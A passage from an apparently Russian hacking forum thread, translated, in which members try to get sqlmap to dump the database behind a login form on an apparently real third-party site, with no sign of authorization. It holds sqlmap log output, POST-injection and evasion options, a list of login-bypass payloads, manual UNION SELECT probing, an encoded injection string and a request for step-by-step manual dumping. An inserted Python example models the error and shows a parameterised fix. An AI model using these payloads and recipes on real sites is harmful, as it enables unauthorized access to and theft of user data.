    injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
    [21:44:56] [INFO] testing 'MySQL UNION query (30) - 21 to 40 columns'
    [21:44:59] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
    [21:45:02] [INFO] testing 'MySQL UNION query (30) - 61 to 80 columns'
    [21:45:05] [INFO] testing 'MySQL UNION query (30) - 81 to 100 columns'
    [21:45:08] [INFO] checking if the injection point on POST parameter 'username' is a false positive
    [21:45:08] [WARNING] false positive or unexploitable injection point detected
    [21:45:08] [WARNING] POST parameter 'username' does not seem to be injectable
    [21:45:08] [INFO] testing if POST parameter 'passw' is dynamic
    [21:45:08] [WARNING] POST parameter 'passw' does not appear to be dynamic
    [21:45:08] [WARNING] heuristic (basic) test shows that POST parameter 'passw' might not be injectable
    
    
     
  12. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    107
    Likes Received:
    9
    Reputations:
    0
    --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql -p username
    or
    --data "username=admin*&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql


    could be a WAF, or just an ordinary database error.
     
  13. Muracha

    Muracha New Member

    Joined:
    30 Jul 2011
    Messages:
    127
    Likes Received:
    3
    Reputations:
    0
    None of the suggestions above worked, unfortunately. Interestingly, as an experiment I typed in:
    Code:
    --level=1 --risk=1 --banner -v 3 --union-cols=1-66
    --dbms="MySQL" --technique=EBU --identify-waf --no-cast
    Which in turn did not work either.
     
  14. LoginUserName

    LoginUserName New Member

    Joined:
    14 Apr 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Does nobody know how to make sqlmap dump correctly?
     
  15. Muracha

    Muracha New Member

    Joined:
    30 Jul 2011
    Messages:
    127
    Likes Received:
    3
    Reputations:
    0
    Maybe sqlmap isn't the problem? I would try running sqlmap from a different folder, from Kali Linux, or something other than sqlmap altogether; if everything is the same, then it's not sqlmap.
     
  16. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    344
    Likes Received:
    278
    Reputations:
    86
    Most likely it's not sqlmap that dumps "incorrectly"; the script in which the injection was found is escaping the slashes. Try checking the output by hand!
    Have you tried getting the result manually? Or is working through sqlmap the only way you know how to handle a DB injection? sqlmap is not a panacea!
     
  17. Muracha

    Muracha New Member

    Joined:
    30 Jul 2011
    Messages:
    127
    Likes Received:
    3
    Reputations:
    0
    I did
    Of course I did!

    First I went through the login attempts, which gave the message "user not found in the database".
    No syntax error was shown. Only the "username" field is vulnerable; passwd gives zero reaction.
    Code:
    ' OR '1
    ' OR 1 -- -
    " OR "" = "
    " OR 1 = 1 -- -
    '='
    'LIKE'
    '=0--+
    Then I tried to find the tables with the order by method and by hand with union+select+1,2,3-- and here I ran into the same error everywhere:
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 2' at line 1
    
    Hence the original question: why do I see the bug by hand but can't use it, while sqlmap also sees the bug at first and then says no, it's not a bug... or is sqlmap not the problem here either.
     
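Why `admin'` produces exactly "near '' LIMIT 2'" and how a parameterised query removes the whole class of problem, as an added example that is neither the poster's code nor the site's: a constructed login lookup modelled on the error text quoted in the posts, with sqlite3 standing in for MariaDB. The table, the column names and the sample account are assumptions, as is the shape of the site's query.

```python
"""Model of the login query behind the MariaDB error quoted in the thread.

Added example (not the forum poster's code or the target site's code).
sqlite3 stands in for MariaDB; the users table and its one account are
constructed, and the concatenated query is an assumption about the shape
of a query that ends in "... LIMIT 2".
"""
import sqlite3


def make_db():
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, passw TEXT)")
    conn.execute("INSERT INTO users (username, passw) VALUES ('admin', 'correct horse')")
    conn.commit()
    return conn


def vulnerable_lookup(conn, username, passw):
    """String-built query: the input becomes part of the SQL text itself.

    With username = "admin'" the text becomes
        ... WHERE username='admin'' AND passw='x' LIMIT 2
    The parser reads 'admin'' AND passw=' as ONE string literal (doubled quote
    = escaped quote), then sees the identifier x, then an unterminated literal
    ' LIMIT 2 -- which is precisely where the quoted MariaDB error points.
    """
    sql = ("SELECT id, username FROM users WHERE username='" + username +
           "' AND passw='" + passw + "' LIMIT 2")
    return conn.execute(sql).fetchall()


def safe_lookup(conn, username, passw):
    """Parameterised query: the input is bound as data and never parsed."""
    sql = "SELECT id, username FROM users WHERE username=? AND passw=? LIMIT 2"
    return conn.execute(sql, (username, passw)).fetchall()


def probe(username, passw):
    """Run both variants on the same input and report what each one does."""
    conn = make_db()
    try:
        vuln = ("rows", vulnerable_lookup(conn, username, passw))
    except sqlite3.OperationalError as exc:
        vuln = ("syntax error", str(exc))
    safe = ("rows", safe_lookup(conn, username, passw))
    conn.close()
    return {"vulnerable": vuln, "parameterised": safe}


if __name__ == "__main__":
    # A valid login works in both variants; a stray quote breaks only the
    # concatenated one. Note that ' OR '1 does not bypass this shape either:
    # AND binds tighter than OR, so the clause reads '' OR ('1' AND passw='x'),
    # which is false for a wrong password and yields "no rows" just like the
    # "user not found" the poster saw (a property of this model, not proof
    # about the site).
    for user, pw in [("admin", "correct horse"), ("admin'", "x"), ("' OR '1", "x")]:
        print(repr(user), probe(user, pw))
```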
  18. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    Post the link
     
    cat1vo likes this.
  19. LoginUserName

    LoginUserName New Member

    Joined:
    14 Apr 2018
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Unfortunately, I'm not very good at doing it by hand. Could you explain, step by step, how to dump the database manually with a vulnerability like this?
    POST data
    Code:
    sasai=-1'%20OR%203*2*1=6%20AND%20000646=000646%20--%20
    I'd be grateful
     
  20. cna

    cna New Member

    Joined:
    10 Feb 2018
    Messages:
    7
    Likes Received:
    0
    Reputations:
    1
    $? PM me, or read https://forum.antichat.ru//threads/43966/
    Use the proper urlencode matching together with --no-cast --hex --text-only; the charset can be specified, and a different encoding also makes a difference; with blind injection the timeouts matter too, and of course --drop-set-cookie --flush-session
     
    #660 cna, 18 Apr 2018 at 9:16 PM
    Last edited: 18 Apr 2018 at 9:23 PM